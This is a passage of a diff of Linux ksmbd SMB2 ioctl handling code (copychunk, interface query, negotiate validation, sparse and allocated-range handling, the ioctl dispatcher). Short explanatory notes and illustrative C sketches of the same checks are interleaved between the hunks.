+-			   unsigned long long volatile_id,
+-			   unsigned long long persistent_id,
+-			   struct smb2_ioctl_rsp *rsp)
+-{
+-	struct copychunk_ioctl_rsp *ci_rsp;
+-	struct ksmbd_file *src_fp = NULL, *dst_fp = NULL;
+-	struct srv_copychunk *chunks;
+-	unsigned int i, chunk_count, chunk_count_written = 0;
+-	unsigned int chunk_size_written = 0;
+-	loff_t total_size_written = 0;
+-	int ret = 0;
+-
+-	ci_rsp = (struct copychunk_ioctl_rsp *)&rsp->Buffer[0];
+-
+-	rsp->VolatileFileId = volatile_id;
+-	rsp->PersistentFileId = persistent_id;
+-	ci_rsp->ChunksWritten =
+-		cpu_to_le32(ksmbd_server_side_copy_max_chunk_count());
+-	ci_rsp->ChunkBytesWritten =
+-		cpu_to_le32(ksmbd_server_side_copy_max_chunk_size());
+-	ci_rsp->TotalBytesWritten =
+-		cpu_to_le32(ksmbd_server_side_copy_max_total_size());
+-
+-	chunks = (struct srv_copychunk *)&ci_req->Chunks[0];
+-	chunk_count = le32_to_cpu(ci_req->ChunkCount);
+-	if (chunk_count == 0)
+-		goto out;
+-	total_size_written = 0;
+-
+-	/* verify the SRV_COPYCHUNK_COPY packet */
+-	if (chunk_count > ksmbd_server_side_copy_max_chunk_count() ||
+-	    input_count < offsetof(struct copychunk_ioctl_req, Chunks) +
+-	     chunk_count * sizeof(struct srv_copychunk)) {
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		return -EINVAL;
+-	}
+-
+-	for (i = 0; i < chunk_count; i++) {
+-		if (le32_to_cpu(chunks[i].Length) == 0 ||
+-		    le32_to_cpu(chunks[i].Length) > ksmbd_server_side_copy_max_chunk_size())
+-			break;
+-		total_size_written += le32_to_cpu(chunks[i].Length);
+-	}
+-
+-	if (i < chunk_count ||
+-	    total_size_written > ksmbd_server_side_copy_max_total_size()) {
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		return -EINVAL;
+-	}
+-
+-	src_fp = ksmbd_lookup_foreign_fd(work,
+-					 le64_to_cpu(ci_req->ResumeKey[0]));
+-	dst_fp = ksmbd_lookup_fd_slow(work, volatile_id, persistent_id);
+-	ret = -EINVAL;
+-	if (!src_fp ||
+-	    src_fp->persistent_id != le64_to_cpu(ci_req->ResumeKey[1])) {
+-		rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
+-		goto out;
+-	}
+-
+-	if (!dst_fp) {
+-		rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		goto out;
+-	}
+-
+-	/*
+-	 * FILE_READ_DATA should only be included in
+-	 * the FSCTL_COPYCHUNK case
+-	 */
+-	if (cnt_code == FSCTL_COPYCHUNK &&
+-	    !(dst_fp->daccess & (FILE_READ_DATA_LE | FILE_GENERIC_READ_LE))) {
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		goto out;
+-	}
+-
+-	ret = ksmbd_vfs_copy_file_ranges(work, src_fp, dst_fp,
+-					 chunks, chunk_count,
+-					 &chunk_count_written,
+-					 &chunk_size_written,
+-					 &total_size_written);
+-	if (ret < 0) {
+-		if (ret == -EACCES)
+-			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		else if (ret == -EAGAIN)
+-			rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
+-		else if (ret == -EBADF)
+-			rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-		else if (ret == -EFBIG || ret == -ENOSPC)
+-			rsp->hdr.Status = STATUS_DISK_FULL;
+-		else if (ret == -EINVAL)
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		else if (ret == -EISDIR)
+-			rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
+-		else if (ret == -E2BIG)
+-			rsp->hdr.Status = STATUS_INVALID_VIEW_SIZE;
+-		else
+-			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
+-	}
+-
+-	ci_rsp->ChunksWritten = cpu_to_le32(chunk_count_written);
+-	ci_rsp->ChunkBytesWritten = cpu_to_le32(chunk_size_written);
+-	ci_rsp->TotalBytesWritten = cpu_to_le32(total_size_written);
+-out:
+-	ksmbd_fd_put(work, src_fp);
+-	ksmbd_fd_put(work, dst_fp);
+-	return ret;
+-}
+-
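fsctl_copychunk() validates the SRV_COPYCHUNK_COPY payload before touching either file: the chunk count, the request buffer length, every per-chunk length, and the running total are all bounded. A compact restatement of those checks, with illustrative limits in place of the ksmbd_server_side_copy_max_*() values:

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define MAX_CHUNKS	256		/* illustrative limits only */
#define MAX_CHUNK_BYTES	(1u << 20)
#define MAX_TOTAL_BYTES	(16u << 20)

struct chunk { uint64_t src_off, dst_off; uint32_t len, reserved; };

static bool copychunk_req_valid(const struct chunk *c, uint32_t count,
				size_t payload_bytes)
{
	uint64_t total = 0;
	uint32_t i;

	if (count == 0)
		return true;		/* the handler treats this as a no-op */
	if (count > MAX_CHUNKS)
		return false;
	if (payload_bytes < (size_t)count * sizeof(*c))
		return false;		/* buffer too short for the claim */
	for (i = 0; i < count; i++) {
		if (c[i].len == 0 || c[i].len > MAX_CHUNK_BYTES)
			return false;
		total += c[i].len;	/* bounded above, cannot overflow */
	}
	return total <= MAX_TOTAL_BYTES;
}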
+-static __be32 idev_ipv4_address(struct in_device *idev)
+-{
+-	__be32 addr = 0;
+-
+-	struct in_ifaddr *ifa;
+-
+-	rcu_read_lock();
+-	in_dev_for_each_ifa_rcu(ifa, idev) {
+-		if (ifa->ifa_flags & IFA_F_SECONDARY)
+-			continue;
+-
+-		addr = ifa->ifa_address;
+-		break;
+-	}
+-	rcu_read_unlock();
+-	return addr;
+-}
+-
+-static int fsctl_query_iface_info_ioctl(struct ksmbd_conn *conn,
+-					struct smb2_ioctl_rsp *rsp,
+-					unsigned int out_buf_len)
+-{
+-	struct network_interface_info_ioctl_rsp *nii_rsp = NULL;
+-	int nbytes = 0;
+-	struct net_device *netdev;
+-	struct sockaddr_storage_rsp *sockaddr_storage;
+-	unsigned int flags;
+-	unsigned long long speed;
+-
+-	rtnl_lock();
+-	for_each_netdev(&init_net, netdev) {
+-		bool ipv4_set = false;
+-
+-		if (netdev->type == ARPHRD_LOOPBACK)
+-			continue;
+-
+-		flags = dev_get_flags(netdev);
+-		if (!(flags & IFF_RUNNING))
+-			continue;
+-ipv6_retry:
+-		if (out_buf_len <
+-		    nbytes + sizeof(struct network_interface_info_ioctl_rsp)) {
+-			rtnl_unlock();
+-			return -ENOSPC;
+-		}
+-
+-		nii_rsp = (struct network_interface_info_ioctl_rsp *)
+-				&rsp->Buffer[nbytes];
+-		nii_rsp->IfIndex = cpu_to_le32(netdev->ifindex);
+-
+-		nii_rsp->Capability = 0;
+-		if (netdev->real_num_tx_queues > 1)
+-			nii_rsp->Capability |= cpu_to_le32(RSS_CAPABLE);
+-		if (ksmbd_rdma_capable_netdev(netdev))
+-			nii_rsp->Capability |= cpu_to_le32(RDMA_CAPABLE);
+-
+-		nii_rsp->Next = cpu_to_le32(152);
+-		nii_rsp->Reserved = 0;
+-
+-		if (netdev->ethtool_ops->get_link_ksettings) {
+-			struct ethtool_link_ksettings cmd;
+-
+-			netdev->ethtool_ops->get_link_ksettings(netdev, &cmd);
+-			speed = cmd.base.speed;
+-		} else {
+-			ksmbd_debug(SMB, "%s %s\n", netdev->name,
+-				    "speed is unknown, defaulting to 1Gb/sec");
+-			speed = SPEED_1000;
+-		}
+-
+-		speed *= 1000000;
+-		nii_rsp->LinkSpeed = cpu_to_le64(speed);
+-
+-		sockaddr_storage = (struct sockaddr_storage_rsp *)
+-					nii_rsp->SockAddr_Storage;
+-		memset(sockaddr_storage, 0, 128);
+-
+-		if (!ipv4_set) {
+-			struct in_device *idev;
+-
+-			sockaddr_storage->Family = cpu_to_le16(INTERNETWORK);
+-			sockaddr_storage->addr4.Port = 0;
+-
+-			idev = __in_dev_get_rtnl(netdev);
+-			if (!idev)
+-				continue;
+-			sockaddr_storage->addr4.IPv4address =
+-						idev_ipv4_address(idev);
+-			nbytes += sizeof(struct network_interface_info_ioctl_rsp);
+-			ipv4_set = true;
+-			goto ipv6_retry;
+-		} else {
+-			struct inet6_dev *idev6;
+-			struct inet6_ifaddr *ifa;
+-			__u8 *ipv6_addr = sockaddr_storage->addr6.IPv6address;
+-
+-			sockaddr_storage->Family = cpu_to_le16(INTERNETWORKV6);
+-			sockaddr_storage->addr6.Port = 0;
+-			sockaddr_storage->addr6.FlowInfo = 0;
+-
+-			idev6 = __in6_dev_get(netdev);
+-			if (!idev6)
+-				continue;
+-
+-			list_for_each_entry(ifa, &idev6->addr_list, if_list) {
+-				if (ifa->flags & (IFA_F_TENTATIVE |
+-							IFA_F_DEPRECATED))
+-					continue;
+-				memcpy(ipv6_addr, ifa->addr.s6_addr, 16);
+-				break;
+-			}
+-			sockaddr_storage->addr6.ScopeId = 0;
+-			nbytes += sizeof(struct network_interface_info_ioctl_rsp);
+-		}
+-	}
+-	rtnl_unlock();
+-
+-	/* zero if this is the last one */
+-	if (nii_rsp)
+-		nii_rsp->Next = 0;
+-
+-	rsp->PersistentFileId = SMB2_NO_FID;
+-	rsp->VolatileFileId = SMB2_NO_FID;
+-	return nbytes;
+-}
+-
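The interface walk above emits one network_interface_info_ioctl_rsp record per usable IPv4 and IPv6 address, skipping loopback and non-running devices. For comparison, a hedged userspace sketch of the same address enumeration via getifaddrs() (the RSS/RDMA capability bits and link speed have no portable equivalent):

#include <ifaddrs.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/socket.h>

static void list_iface_addrs(void)
{
	struct ifaddrs *ifa, *p;
	char host[NI_MAXHOST];

	if (getifaddrs(&ifa) < 0)
		return;
	for (p = ifa; p; p = p->ifa_next) {
		socklen_t len;

		if (!p->ifa_addr)
			continue;
		if (p->ifa_addr->sa_family == AF_INET)
			len = sizeof(struct sockaddr_in);
		else if (p->ifa_addr->sa_family == AF_INET6)
			len = sizeof(struct sockaddr_in6);
		else
			continue;
		if (!getnameinfo(p->ifa_addr, len, host, sizeof(host),
				 NULL, 0, NI_NUMERICHOST))
			printf("%s: %s\n", p->ifa_name, host);
	}
	freeifaddrs(ifa);
}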
+-static int fsctl_validate_negotiate_info(struct ksmbd_conn *conn,
+-					 struct validate_negotiate_info_req *neg_req,
+-					 struct validate_negotiate_info_rsp *neg_rsp,
+-					 unsigned int in_buf_len)
+-{
+-	int ret = 0;
+-	int dialect;
+-
+-	if (in_buf_len < offsetof(struct validate_negotiate_info_req, Dialects) +
+-			le16_to_cpu(neg_req->DialectCount) * sizeof(__le16))
+-		return -EINVAL;
+-
+-	dialect = ksmbd_lookup_dialect_by_id(neg_req->Dialects,
+-					     neg_req->DialectCount);
+-	if (dialect == BAD_PROT_ID || dialect != conn->dialect) {
+-		ret = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	if (strncmp(neg_req->Guid, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE)) {
+-		ret = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	if (le16_to_cpu(neg_req->SecurityMode) != conn->cli_sec_mode) {
+-		ret = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	if (le32_to_cpu(neg_req->Capabilities) != conn->cli_cap) {
+-		ret = -EINVAL;
+-		goto err_out;
+-	}
+-
+-	neg_rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
+-	memset(neg_rsp->Guid, 0, SMB2_CLIENT_GUID_SIZE);
+-	neg_rsp->SecurityMode = cpu_to_le16(conn->srv_sec_mode);
+-	neg_rsp->Dialect = cpu_to_le16(conn->dialect);
+-err_out:
+-	return ret;
+-}
+-
+-static int fsctl_query_allocated_ranges(struct ksmbd_work *work, u64 id,
+-					struct file_allocated_range_buffer *qar_req,
+-					struct file_allocated_range_buffer *qar_rsp,
+-					unsigned int in_count, unsigned int *out_count)
+-{
+-	struct ksmbd_file *fp;
+-	loff_t start, length;
+-	int ret = 0;
+-
+-	*out_count = 0;
+-	if (in_count == 0)
+-		return -EINVAL;
+-
+-	start = le64_to_cpu(qar_req->file_offset);
+-	length = le64_to_cpu(qar_req->length);
+-
+-	if (start < 0 || length < 0)
+-		return -EINVAL;
+-
+-	fp = ksmbd_lookup_fd_fast(work, id);
+-	if (!fp)
+-		return -ENOENT;
+-
+-	ret = ksmbd_vfs_fqar_lseek(fp, start, length,
+-				   qar_rsp, in_count, out_count);
+-	if (ret && ret != -E2BIG)
+-		*out_count = 0;
+-
+-	ksmbd_fd_put(work, fp);
+-	return ret;
+-}
+-
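ksmbd_vfs_fqar_lseek() answers the allocated-range query with lseek() and SEEK_DATA/SEEK_HOLE. The same walk, as a minimal standalone sketch:

#define _GNU_SOURCE	/* SEEK_DATA/SEEK_HOLE */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

static void dump_allocated_ranges(int fd, off_t start, off_t end)
{
	while (start < end) {
		off_t data = lseek(fd, start, SEEK_DATA);
		off_t hole;

		if (data < 0 || data >= end)
			break;		/* no more data in the range */
		hole = lseek(fd, data, SEEK_HOLE);
		if (hole < 0)
			break;
		if (hole > end)
			hole = end;
		printf("allocated: [%lld, %lld)\n",
		       (long long)data, (long long)hole);
		start = hole;
	}
}

Each printed [data, hole) pair corresponds to one file_allocated_range_buffer entry in the response.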
+-static int fsctl_pipe_transceive(struct ksmbd_work *work, u64 id,
+-				 unsigned int out_buf_len,
+-				 struct smb2_ioctl_req *req,
+-				 struct smb2_ioctl_rsp *rsp)
+-{
+-	struct ksmbd_rpc_command *rpc_resp;
+-	char *data_buf = (char *)&req->Buffer[0];
+-	int nbytes = 0;
+-
+-	rpc_resp = ksmbd_rpc_ioctl(work->sess, id, data_buf,
+-				   le32_to_cpu(req->InputCount));
+-	if (rpc_resp) {
+-		if (rpc_resp->flags == KSMBD_RPC_SOME_NOT_MAPPED) {
+-			/*
+-			 * set STATUS_SOME_NOT_MAPPED response
+-			 * for unknown domain sid.
+-			 */
+-			rsp->hdr.Status = STATUS_SOME_NOT_MAPPED;
+-		} else if (rpc_resp->flags == KSMBD_RPC_ENOTIMPLEMENTED) {
+-			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-			goto out;
+-		} else if (rpc_resp->flags != KSMBD_RPC_OK) {
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-			goto out;
+-		}
+-
+-		nbytes = rpc_resp->payload_sz;
+-		if (rpc_resp->payload_sz > out_buf_len) {
+-			rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
+-			nbytes = out_buf_len;
+-		}
+-
+-		if (!rpc_resp->payload_sz) {
+-			rsp->hdr.Status =
+-				STATUS_UNEXPECTED_IO_ERROR;
+-			goto out;
+-		}
+-
+-		memcpy((char *)rsp->Buffer, rpc_resp->payload, nbytes);
+-	}
+-out:
+-	kvfree(rpc_resp);
+-	return nbytes;
+-}
+-
+-static inline int fsctl_set_sparse(struct ksmbd_work *work, u64 id,
+-				   struct file_sparse *sparse)
+-{
+-	struct ksmbd_file *fp;
+-	struct user_namespace *user_ns;
+-	int ret = 0;
+-	__le32 old_fattr;
+-
+-	fp = ksmbd_lookup_fd_fast(work, id);
+-	if (!fp)
+-		return -ENOENT;
+-	user_ns = file_mnt_user_ns(fp->filp);
+-
+-	old_fattr = fp->f_ci->m_fattr;
+-	if (sparse->SetSparse)
+-		fp->f_ci->m_fattr |= FILE_ATTRIBUTE_SPARSE_FILE_LE;
+-	else
+-		fp->f_ci->m_fattr &= ~FILE_ATTRIBUTE_SPARSE_FILE_LE;
+-
+-	if (fp->f_ci->m_fattr != old_fattr &&
+-	    test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_STORE_DOS_ATTRS)) {
+-		struct xattr_dos_attrib da;
+-
+-		ret = ksmbd_vfs_get_dos_attrib_xattr(user_ns,
+-						     fp->filp->f_path.dentry, &da);
+-		if (ret <= 0)
+-			goto out;
+-
+-		da.attr = le32_to_cpu(fp->f_ci->m_fattr);
+-		ret = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
+-						     fp->filp->f_path.dentry, &da);
+-		if (ret)
+-			fp->f_ci->m_fattr = old_fattr;
+-	}
+-
+-out:
+-	ksmbd_fd_put(work, fp);
+-	return ret;
+-}
+-
+-static int fsctl_request_resume_key(struct ksmbd_work *work,
+-				    struct smb2_ioctl_req *req,
+-				    struct resume_key_ioctl_rsp *key_rsp)
+-{
+-	struct ksmbd_file *fp;
+-
+-	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+-	if (!fp)
+-		return -ENOENT;
+-
+-	memset(key_rsp, 0, sizeof(*key_rsp));
+-	key_rsp->ResumeKey[0] = req->VolatileFileId;
+-	key_rsp->ResumeKey[1] = req->PersistentFileId;
+-	ksmbd_fd_put(work, fp);
+-
+-	return 0;
+-}
+-
+-/**
+- * smb2_ioctl() - handler for smb2 ioctl command
+- * @work:	smb work containing ioctl command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_ioctl(struct ksmbd_work *work)
+-{
+-	struct smb2_ioctl_req *req;
+-	struct smb2_ioctl_rsp *rsp;
+-	unsigned int cnt_code, nbytes = 0, out_buf_len, in_buf_len;
+-	u64 id = KSMBD_NO_FID;
+-	struct ksmbd_conn *conn = work->conn;
+-	int ret = 0;
+-
+-	if (work->next_smb2_rcv_hdr_off) {
+-		req = ksmbd_req_buf_next(work);
+-		rsp = ksmbd_resp_buf_next(work);
+-		if (!has_file_id(req->VolatileFileId)) {
+-			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
+-				    work->compound_fid);
+-			id = work->compound_fid;
+-		}
+-	} else {
+-		req = smb2_get_msg(work->request_buf);
+-		rsp = smb2_get_msg(work->response_buf);
+-	}
+-
+-	if (!has_file_id(id))
+-		id = req->VolatileFileId;
+-
+-	if (req->Flags != cpu_to_le32(SMB2_0_IOCTL_IS_FSCTL)) {
+-		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-		goto out;
+-	}
+-
+-	cnt_code = le32_to_cpu(req->CtlCode);
+-	ret = smb2_calc_max_out_buf_len(work, 48,
+-					le32_to_cpu(req->MaxOutputResponse));
+-	if (ret < 0) {
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		goto out;
+-	}
+-	out_buf_len = (unsigned int)ret;
+-	in_buf_len = le32_to_cpu(req->InputCount);
+-
+-	switch (cnt_code) {
+-	case FSCTL_DFS_GET_REFERRALS:
+-	case FSCTL_DFS_GET_REFERRALS_EX:
+-		/* DFS not supported yet */
+-		rsp->hdr.Status = STATUS_FS_DRIVER_REQUIRED;
+-		goto out;
+-	case FSCTL_CREATE_OR_GET_OBJECT_ID:
+-	{
+-		struct file_object_buf_type1_ioctl_rsp *obj_buf;
+-
+-		nbytes = sizeof(struct file_object_buf_type1_ioctl_rsp);
+-		obj_buf = (struct file_object_buf_type1_ioctl_rsp *)
+-			&rsp->Buffer[0];
+-
+-		/*
+-		 * TODO: This is a dummy implementation to pass smbtorture.
+-		 * The correct response still needs to be verified.
+-		 */
+-		memset(obj_buf->ObjectId, 0x0, 16);
+-		memset(obj_buf->BirthVolumeId, 0x0, 16);
+-		memset(obj_buf->BirthObjectId, 0x0, 16);
+-		memset(obj_buf->DomainId, 0x0, 16);
+-
+-		break;
+-	}
+-	case FSCTL_PIPE_TRANSCEIVE:
+-		out_buf_len = min_t(u32, KSMBD_IPC_MAX_PAYLOAD, out_buf_len);
+-		nbytes = fsctl_pipe_transceive(work, id, out_buf_len, req, rsp);
+-		break;
+-	case FSCTL_VALIDATE_NEGOTIATE_INFO:
+-		if (conn->dialect < SMB30_PROT_ID) {
+-			ret = -EOPNOTSUPP;
+-			goto out;
+-		}
+-
+-		if (in_buf_len < offsetof(struct validate_negotiate_info_req,
+-					  Dialects)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		if (out_buf_len < sizeof(struct validate_negotiate_info_rsp)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		ret = fsctl_validate_negotiate_info(conn,
+-			(struct validate_negotiate_info_req *)&req->Buffer[0],
+-			(struct validate_negotiate_info_rsp *)&rsp->Buffer[0],
+-			in_buf_len);
+-		if (ret < 0)
+-			goto out;
+-
+-		nbytes = sizeof(struct validate_negotiate_info_rsp);
+-		rsp->PersistentFileId = SMB2_NO_FID;
+-		rsp->VolatileFileId = SMB2_NO_FID;
+-		break;
+-	case FSCTL_QUERY_NETWORK_INTERFACE_INFO:
+-		ret = fsctl_query_iface_info_ioctl(conn, rsp, out_buf_len);
+-		if (ret < 0)
+-			goto out;
+-		nbytes = ret;
+-		break;
+-	case FSCTL_REQUEST_RESUME_KEY:
+-		if (out_buf_len < sizeof(struct resume_key_ioctl_rsp)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		ret = fsctl_request_resume_key(work, req,
+-					       (struct resume_key_ioctl_rsp *)&rsp->Buffer[0]);
+-		if (ret < 0)
+-			goto out;
+-		rsp->PersistentFileId = req->PersistentFileId;
+-		rsp->VolatileFileId = req->VolatileFileId;
+-		nbytes = sizeof(struct resume_key_ioctl_rsp);
+-		break;
+-	case FSCTL_COPYCHUNK:
+-	case FSCTL_COPYCHUNK_WRITE:
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			ret = -EACCES;
+-			goto out;
+-		}
+-
+-		if (in_buf_len < sizeof(struct copychunk_ioctl_req)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		if (out_buf_len < sizeof(struct copychunk_ioctl_rsp)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		nbytes = sizeof(struct copychunk_ioctl_rsp);
+-		rsp->VolatileFileId = req->VolatileFileId;
+-		rsp->PersistentFileId = req->PersistentFileId;
+-		fsctl_copychunk(work,
+-				(struct copychunk_ioctl_req *)&req->Buffer[0],
+-				le32_to_cpu(req->CtlCode),
+-				le32_to_cpu(req->InputCount),
+-				req->VolatileFileId,
+-				req->PersistentFileId,
+-				rsp);
+-		break;
+-	case FSCTL_SET_SPARSE:
+-		if (in_buf_len < sizeof(struct file_sparse)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		ret = fsctl_set_sparse(work, id,
+-				       (struct file_sparse *)&req->Buffer[0]);
+-		if (ret < 0)
+-			goto out;
+-		break;
+-	case FSCTL_SET_ZERO_DATA:
+-	{
+-		struct file_zero_data_information *zero_data;
+-		struct ksmbd_file *fp;
+-		loff_t off, len, bfz;
+-
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			ret = -EACCES;
+-			goto out;
+-		}
+-
+-		if (in_buf_len < sizeof(struct file_zero_data_information)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		zero_data =
+-			(struct file_zero_data_information *)&req->Buffer[0];
+-
+-		off = le64_to_cpu(zero_data->FileOffset);
+-		bfz = le64_to_cpu(zero_data->BeyondFinalZero);
+-		if (off < 0 || bfz < 0 || off > bfz) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		len = bfz - off;
+-		if (len) {
+-			fp = ksmbd_lookup_fd_fast(work, id);
+-			if (!fp) {
+-				ret = -ENOENT;
+-				goto out;
+-			}
+-
+-			ret = ksmbd_vfs_zero_data(work, fp, off, len);
+-			ksmbd_fd_put(work, fp);
+-			if (ret < 0)
+-				goto out;
+-		}
+-		break;
+-	}
+-	case FSCTL_QUERY_ALLOCATED_RANGES:
+-		if (in_buf_len < sizeof(struct file_allocated_range_buffer)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		ret = fsctl_query_allocated_ranges(work, id,
+-			(struct file_allocated_range_buffer *)&req->Buffer[0],
+-			(struct file_allocated_range_buffer *)&rsp->Buffer[0],
+-			out_buf_len /
+-			sizeof(struct file_allocated_range_buffer), &nbytes);
+-		if (ret == -E2BIG) {
+-			rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
+-		} else if (ret < 0) {
+-			nbytes = 0;
+-			goto out;
+-		}
+-
+-		nbytes *= sizeof(struct file_allocated_range_buffer);
+-		break;
+-	case FSCTL_GET_REPARSE_POINT:
+-	{
+-		struct reparse_data_buffer *reparse_ptr;
+-		struct ksmbd_file *fp;
+-
+-		reparse_ptr = (struct reparse_data_buffer *)&rsp->Buffer[0];
+-		fp = ksmbd_lookup_fd_fast(work, id);
+-		if (!fp) {
+-			pr_err("file pointer not found\n");
+-			ret = -ENOENT;
+-			goto out;
+-		}
+-
+-		reparse_ptr->ReparseTag =
+-			smb2_get_reparse_tag_special_file(file_inode(fp->filp)->i_mode);
+-		reparse_ptr->ReparseDataLength = 0;
+-		ksmbd_fd_put(work, fp);
+-		nbytes = sizeof(struct reparse_data_buffer);
+-		break;
+-	}
+-	case FSCTL_DUPLICATE_EXTENTS_TO_FILE:
+-	{
+-		struct ksmbd_file *fp_in, *fp_out = NULL;
+-		struct duplicate_extents_to_file *dup_ext;
+-		loff_t src_off, dst_off, length, cloned;
+-
+-		if (in_buf_len < sizeof(struct duplicate_extents_to_file)) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		dup_ext = (struct duplicate_extents_to_file *)&req->Buffer[0];
+-
+-		fp_in = ksmbd_lookup_fd_slow(work, dup_ext->VolatileFileHandle,
+-					     dup_ext->PersistentFileHandle);
+-		if (!fp_in) {
+-			pr_err("file handle not found in duplicate extents to file\n");
+-			ret = -ENOENT;
+-			goto out;
+-		}
+-
+-		fp_out = ksmbd_lookup_fd_fast(work, id);
+-		if (!fp_out) {
+-			pr_err("file pointer not found\n");
+-			ret = -ENOENT;
+-			goto dup_ext_out;
+-		}
+-
+-		src_off = le64_to_cpu(dup_ext->SourceFileOffset);
+-		dst_off = le64_to_cpu(dup_ext->TargetFileOffset);
+-		length = le64_to_cpu(dup_ext->ByteCount);
+-		/*
+-		 * XXX: It is not clear if FSCTL_DUPLICATE_EXTENTS_TO_FILE
+-		 * should fall back to vfs_copy_file_range().  This could be
+-		 * beneficial when re-exporting nfs/smb mount, but note that
+-		 * this can result in partial copy that returns an error status.
+-		 * If/when FSCTL_DUPLICATE_EXTENTS_TO_FILE_EX is implemented,
+-		 * fall back to vfs_copy_file_range(), should be avoided when
+-		 * the flag DUPLICATE_EXTENTS_DATA_EX_SOURCE_ATOMIC is set.
+-		 */
+-		cloned = vfs_clone_file_range(fp_in->filp, src_off,
+-					      fp_out->filp, dst_off, length, 0);
+-		if (cloned == -EXDEV || cloned == -EOPNOTSUPP) {
+-			ret = -EOPNOTSUPP;
+-			goto dup_ext_out;
+-		} else if (cloned != length) {
+-			cloned = vfs_copy_file_range(fp_in->filp, src_off,
+-						     fp_out->filp, dst_off,
+-						     length, 0);
+-			if (cloned != length) {
+-				if (cloned < 0)
+-					ret = cloned;
+-				else
+-					ret = -EINVAL;
+-			}
+-		}
+-
+-dup_ext_out:
+-		ksmbd_fd_put(work, fp_in);
+-		ksmbd_fd_put(work, fp_out);
+-		if (ret < 0)
+-			goto out;
+-		break;
+-	}
+-	default:
+-		ksmbd_debug(SMB, "not implemented yet ioctl command 0x%x\n",
+-			    cnt_code);
+-		ret = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	rsp->CtlCode = cpu_to_le32(cnt_code);
+-	rsp->InputCount = cpu_to_le32(0);
+-	rsp->InputOffset = cpu_to_le32(112);
+-	rsp->OutputOffset = cpu_to_le32(112);
+-	rsp->OutputCount = cpu_to_le32(nbytes);
+-	rsp->StructureSize = cpu_to_le16(49);
+-	rsp->Reserved = cpu_to_le16(0);
+-	rsp->Flags = cpu_to_le32(0);
+-	rsp->Reserved2 = cpu_to_le32(0);
+-	inc_rfc1001_len(work->response_buf, 48 + nbytes);
+-
+-	return 0;
+-
+-out:
+-	if (ret == -EACCES)
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-	else if (ret == -ENOENT)
+-		rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
+-	else if (ret == -EOPNOTSUPP)
+-		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-	else if (ret == -ENOSPC)
+-		rsp->hdr.Status = STATUS_BUFFER_TOO_SMALL;
+-	else if (ret < 0 || rsp->hdr.Status == 0)
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-	smb2_set_err_rsp(work);
+-	return 0;
+-}
+-
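smb2_ioctl() dispatches on the FSCTL code with one large switch, and every case validates in_buf_len/out_buf_len before trusting the payload. Purely as an illustration of an alternative shape (not how ksmbd is structured), the same dispatch can be table-driven; the handler below is invented, while the FSCTL_PIPE_TRANSCEIVE value is the MS-FSCC constant:

#include <errno.h>
#include <stddef.h>
#include <stdint.h>

struct fsctl_handler {
	uint32_t code;
	int (*fn)(const void *req, void *rsp);
};

/* invented stand-in for a real handler */
static int handle_pipe_transceive(const void *req, void *rsp)
{
	(void)req; (void)rsp;
	return 0;
}

static const struct fsctl_handler fsctl_table[] = {
	{ 0x0011C017 /* FSCTL_PIPE_TRANSCEIVE */, handle_pipe_transceive },
};

static int dispatch_fsctl(uint32_t code, const void *req, void *rsp)
{
	size_t i;

	for (i = 0; i < sizeof(fsctl_table) / sizeof(fsctl_table[0]); i++)
		if (fsctl_table[i].code == code)
			return fsctl_table[i].fn(req, rsp);
	return -EOPNOTSUPP;	/* mirrors the switch's default case */
}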
+-/**
+- * smb20_oplock_break_ack() - handler for smb2.0 oplock break command
+- * @work:	smb work containing oplock break command buffer
+- *
+- * Return:	none
+- */
